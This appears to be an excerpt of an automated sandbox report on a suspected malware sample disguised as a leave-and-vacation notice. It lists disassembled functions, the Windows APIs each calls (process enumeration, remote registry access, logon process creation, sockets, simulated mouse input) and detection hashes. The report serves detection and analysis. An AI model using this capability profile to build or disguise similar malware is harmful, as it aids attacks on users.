                                                      • Instruction ID: 46cc528043080fe95aaf47a4a3786c1172c3c8e0dfacb20c318ab2bb3fde4251
                                                      • Opcode Fuzzy Hash: 6cd15c6fe0caf72bbbd83dee9588890f8a10a7d314d7b032ed362aefdc92d50d
                                                      • Instruction Fuzzy Hash: 8AB16F7990024ADBEF10CFA8C4807EDB7B1FF08750F149529ED5AEB254DB30A950EBA4
                                                      Function 00FE1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00FE1C18
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00FE1C26
                                                      • __wsplitpath.LIBCMT ref: 00FE1C54
                                                        • Part of subcall function 00FA1DFC: __wsplitpath_helper.LIBCMT ref: 00FA1E3C
                                                      • _wcscat.LIBCMT ref: 00FE1C69
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00FE1CDF
                                                      • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00FE1CF1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                      • String ID:
                                                      • API String ID: 1380811348-0
                                                      • Opcode ID: 6b36c242c0d5bbd088453e06751e489fcbdd71f6d650914c3341a0a9dbb5b6b9
                                                      • Instruction ID: eb2745023642000c8c3ccbc8a55302d13f0a432d28122fde0fc05626bda91b50
                                                      • Opcode Fuzzy Hash: 6b36c242c0d5bbd088453e06751e489fcbdd71f6d650914c3341a0a9dbb5b6b9
                                                      • Instruction Fuzzy Hash: FD516B71504340AFD720EF65CC85EABB7ECEF88754F00492EF58697291EB749A04DBA2
                                                      Function 00FE2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FE3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FE2BB5,?,?), ref: 00FE3C1D
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FE30AF
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FE30EF
                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00FE3112
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00FE313B
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00FE317E
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FE318B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                      • String ID:
                                                      • API String ID: 3451389628-0
                                                      • Opcode ID: 0c86d003276c0bd87af72dafaae996a336a0f76ecbe132f1ad4ed749fcd30823
                                                      • Instruction ID: 8188e762efb77548e2d6da2f5f01a55f0e4ae2886e6185dc907348b5ffb089ae
                                                      • Opcode Fuzzy Hash: 0c86d003276c0bd87af72dafaae996a336a0f76ecbe132f1ad4ed749fcd30823
                                                      • Instruction Fuzzy Hash: 58514931504340AFC710EF64CC99EAAB7E9BF88314F04491DF59587291DB79EA05EB52
                                                      Function 00FE84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenu.USER32(?), ref: 00FE8540
                                                      • GetMenuItemCount.USER32(00000000), ref: 00FE8577
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00FE859F
                                                      • GetMenuItemID.USER32(?,?), ref: 00FE860E
                                                      • GetSubMenu.USER32(?,?), ref: 00FE861C
                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00FE866D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountMessagePostString
                                                      • String ID:
                                                      • API String ID: 650687236-0
                                                      • Opcode ID: a3a2cf84fd9ca1307bda759da3f3929b0aabb812f3b4a59c446723d209e872f6
                                                      • Instruction ID: 00029f38d9515970381185bcf9bf4e5d028e018388682d88c84737d4d6ff1a79
                                                      • Opcode Fuzzy Hash: a3a2cf84fd9ca1307bda759da3f3929b0aabb812f3b4a59c446723d209e872f6
                                                      • Instruction Fuzzy Hash: 95519D31E00215AFCF11EF95C941AAEB7F4BF48360F144459E91ABB341CF39AE41AB90
                                                      Function 00FC4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FC4B10
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FC4B5B
                                                      • IsMenu.USER32(00000000), ref: 00FC4B7B
                                                      • CreatePopupMenu.USER32 ref: 00FC4BAF
                                                      • GetMenuItemCount.USER32(000000FF), ref: 00FC4C0D
                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00FC4C3E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                      • String ID:
                                                      • API String ID: 3311875123-0
                                                      • Opcode ID: 42bbcad88240b0e45f67dab1b511ce0fd952dc0499774cf0aa8a6b06d70c56c2
                                                      • Instruction ID: dfc574e984c6bdc43c7cc80d5f4c31d67ba5d2818a522fe8d8b940bf47fc527b
                                                      • Opcode Fuzzy Hash: 42bbcad88240b0e45f67dab1b511ce0fd952dc0499774cf0aa8a6b06d70c56c2
                                                      • Instruction Fuzzy Hash: E851F470A0120ADFDF21CF64CA96FADBBF4AF84324F14411DE465972A1D375AD44EB11
                                                      Function 00FD8DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0101DC00), ref: 00FD8E7C
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00FD8E89
                                                      • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00FD8EAD
                                                      • #16.WSOCK32(?,?,00000000,00000000), ref: 00FD8EC5
                                                      • _strlen.LIBCMT ref: 00FD8EF7
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00FD8F6A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_strlenselect
                                                      • String ID:
                                                      • API String ID: 2217125717-0
                                                      • Opcode ID: dc7e5ff0aa83307e26b771b02221b94c5cdbd8bdc93223b90ef231250db700ea
                                                      • Instruction ID: 13b1d1faa0f1cf7e97625aeab0acb0285e7438e7fac66f4f8d6389772f93a8a8
                                                      • Opcode Fuzzy Hash: dc7e5ff0aa83307e26b771b02221b94c5cdbd8bdc93223b90ef231250db700ea
                                                      • Instruction Fuzzy Hash: 5741C471900104AFCB14EBA4CD96FEEB7BAAF48354F14465AF11A97291EF34AE00DB60
                                                      Function 00F9ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                      • BeginPaint.USER32(?,?,?), ref: 00F9AC2A
                                                      • GetWindowRect.USER32(?,?), ref: 00F9AC8E
                                                      • ScreenToClient.USER32(?,?), ref: 00F9ACAB
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F9ACBC
                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00F9AD06
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00FFE673
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                      • String ID:
                                                      • API String ID: 2592858361-0
                                                      • Opcode ID: 135b6e251c7c0f642c09d04bcc1e313eea68f625194e0fedd65ebcb3d7f9f5f0
                                                      • Instruction ID: 88fbb865b5639a3305793476c43bfe02f4925439d424445295b645d52b7f709b
                                                      • Opcode Fuzzy Hash: 135b6e251c7c0f642c09d04bcc1e313eea68f625194e0fedd65ebcb3d7f9f5f0
                                                      • Instruction Fuzzy Hash: BF41D375504304AFDB21DF64D884F767BA8EF59320F040669FA94872A1C735E884EBA2
                                                      Function 00FEE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(01041628,00000000,01041628,00000000,00000000,01041628,?,00FFDC5D,00000000,?,00000000,00000000,00000000,?,00FFDAD1,00000004), ref: 00FEE40B
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00FEE42F
                                                      • ShowWindow.USER32(01041628,00000000), ref: 00FEE48F
                                                      • ShowWindow.USER32(00000000,00000004), ref: 00FEE4A1
                                                      • EnableWindow.USER32(00000000,00000001), ref: 00FEE4C5
                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00FEE4E8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: c57243a1ededabf9aa0f498711438e0913321838bffacd958b27bbe2450e0be7
                                                      • Instruction ID: 30a8b13338a1c03f6b1aba47e1f808f2ade2d7e5bf6faa9fc6f58ff5bafd6b1d
                                                      • Opcode Fuzzy Hash: c57243a1ededabf9aa0f498711438e0913321838bffacd958b27bbe2450e0be7
                                                      • Instruction Fuzzy Hash: CC418338A01580EFDB22CF65D499B947BE1BF09324F1841B9EA5C8F2E2C735E845DB61
                                                      Function 00FC98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00FC98D1
                                                        • Part of subcall function 00F9F4EA: std::exception::exception.LIBCMT ref: 00F9F51E
                                                        • Part of subcall function 00F9F4EA: __CxxThrowException@8.LIBCMT ref: 00F9F533
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00FC9908
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00FC9924
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00FC999E
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00FC99B3
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FC99D2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 2537439066-0
                                                      • Opcode ID: 7abdd07c693175c904fa7bc925b020f09acd7b2675032c6eb4340157523cb53f
                                                      • Instruction ID: bc11d40bf1039d92f72354a5d2ef4e9085b98748aaaa0961dbe986abd1567add
                                                      • Opcode Fuzzy Hash: 7abdd07c693175c904fa7bc925b020f09acd7b2675032c6eb4340157523cb53f
                                                      • Instruction Fuzzy Hash: F3315031900205EBDF11EFA5DD85EAAB778FF44310F1480A9E905EB24AD779DE14EBA0
                                                      Function 00FD9B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00FD77F4,?,?,00000000,00000001), ref: 00FD9B53
                                                        • Part of subcall function 00FD6544: GetWindowRect.USER32(?,?), ref: 00FD6557
                                                      • GetDesktopWindow.USER32 ref: 00FD9B7D
                                                      • GetWindowRect.USER32(00000000), ref: 00FD9B84
                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00FD9BB6
                                                        • Part of subcall function 00FC7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FC7AD0
                                                      • GetCursorPos.USER32(?), ref: 00FD9BE2
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00FD9C44
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                      • String ID:
                                                      • API String ID: 4137160315-0
                                                      • Opcode ID: b82716280c007f5dc7dba3fb0f947923e763dcaa024cb45420ac6bcec06d0190
                                                      • Instruction ID: 118211e704aa04a5d1fbd246f1872e1af8800e74e5c2e93d2e20c577ef8584d7
                                                      • Opcode Fuzzy Hash: b82716280c007f5dc7dba3fb0f947923e763dcaa024cb45420ac6bcec06d0190
                                                      • Instruction Fuzzy Hash: F431D472508306ABC720DF94DC49F9BB7EAFF89314F04091AF585E7281DA75EA08CB91
                                                      Function 00FBAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FBAFAE
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00FBAFB5
                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FBAFC4
                                                      • CloseHandle.KERNEL32(00000004), ref: 00FBAFCF
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FBAFFE
                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00FBB012
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 1413079979-0
                                                      • Opcode ID: 9cfc97db141deb281bc25fe469442186ca1472cf6f6e8232d4e98562589813ca
                                                      • Instruction ID: 4de98fda42b410c3aa4e4ff8b67753869d0c8a1dd47d2747798d57786ae21c72
                                                      • Opcode Fuzzy Hash: 9cfc97db141deb281bc25fe469442186ca1472cf6f6e8232d4e98562589813ca
                                                      • Instruction Fuzzy Hash: EB2188B250020DAFCF128FE9E909FEE7BA9EF44354F048025FA01A2151D37ADD20EB61
                                                      Function 00FEEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00F9AFE3
                                                        • Part of subcall function 00F9AF83: SelectObject.GDI32(?,00000000), ref: 00F9AFF2
                                                        • Part of subcall function 00F9AF83: BeginPath.GDI32(?), ref: 00F9B009
                                                        • Part of subcall function 00F9AF83: SelectObject.GDI32(?,00000000), ref: 00F9B033
                                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00FEEC20
                                                      • LineTo.GDI32(00000000,00000003,?), ref: 00FEEC34
                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00FEEC42
                                                      • LineTo.GDI32(00000000,00000000,?), ref: 00FEEC52
                                                      • EndPath.GDI32(00000000), ref: 00FEEC62
                                                      • StrokePath.GDI32(00000000), ref: 00FEEC72
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                      • String ID:
                                                      • API String ID: 43455801-0
                                                      • Opcode ID: 053cb622c78aace40e58b89b5bea4780e10732d71f8f3794bc6750d5f5693453
                                                      • Instruction ID: 61a5f1c8b935d1329033c71a1029ee306006b825fd2037590658dc751be0a447
                                                      • Opcode Fuzzy Hash: 053cb622c78aace40e58b89b5bea4780e10732d71f8f3794bc6750d5f5693453
                                                      • Instruction Fuzzy Hash: C6113976000149BFEF229FD4DD88FEA7F6DEB083A0F048022BE4889164C7769D55DBA0
                                                      Function 00FBE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00FBE1C0
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FBE1D1
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FBE1D8
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00FBE1E0
                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FBE1F7
                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 00FBE209
                                                        • Part of subcall function 00FB9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00FB9A05,00000000,00000000,?,00FB9DDB), ref: 00FBA53A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$ExceptionRaiseRelease
                                                      • String ID:
                                                      • API String ID: 603618608-0
                                                      • Opcode ID: e9843aa6273005b5e1de0e0ef731348c0c94d50dfcec3b889a97873b51053fe8
                                                      • Instruction ID: bb516c9146f851597d6c07d4162981790d5d950c1b2ffa9686b824f86b2343fd
                                                      • Opcode Fuzzy Hash: e9843aa6273005b5e1de0e0ef731348c0c94d50dfcec3b889a97873b51053fe8
                                                      • Instruction Fuzzy Hash: 6F018FB5E00214BFEB109BE68C45B9EBFB9EB48351F004066EA08A7280DA759C01CFB0
                                                      Function 00FA7B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __init_pointers.LIBCMT ref: 00FA7B47
                                                        • Part of subcall function 00FA123A: __initp_misc_winsig.LIBCMT ref: 00FA125E
                                                        • Part of subcall function 00FA123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FA7F51
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00FA7F65
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00FA7F78
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00FA7F8B
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00FA7F9E
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00FA7FB1
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00FA7FC4
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00FA7FD7
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00FA7FEA
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00FA7FFD
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00FA8010
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00FA8023
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00FA8036
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00FA8049
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00FA805C
                                                        • Part of subcall function 00FA123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00FA806F
                                                      • __mtinitlocks.LIBCMT ref: 00FA7B4C
                                                        • Part of subcall function 00FA7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0103AC68,00000FA0,?,?,00FA7B51,00FA5E77,01036C70,00000014), ref: 00FA7E41
                                                      • __mtterm.LIBCMT ref: 00FA7B55
                                                        • Part of subcall function 00FA7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00FA7B5A,00FA5E77,01036C70,00000014), ref: 00FA7D3F
                                                        • Part of subcall function 00FA7BBD: _free.LIBCMT ref: 00FA7D46
                                                        • Part of subcall function 00FA7BBD: DeleteCriticalSection.KERNEL32(0103AC68,?,?,00FA7B5A,00FA5E77,01036C70,00000014), ref: 00FA7D68
                                                      • __calloc_crt.LIBCMT ref: 00FA7B7A
                                                      • GetCurrentThreadId.KERNEL32 ref: 00FA7BA3
                                                      Memory Dump Source
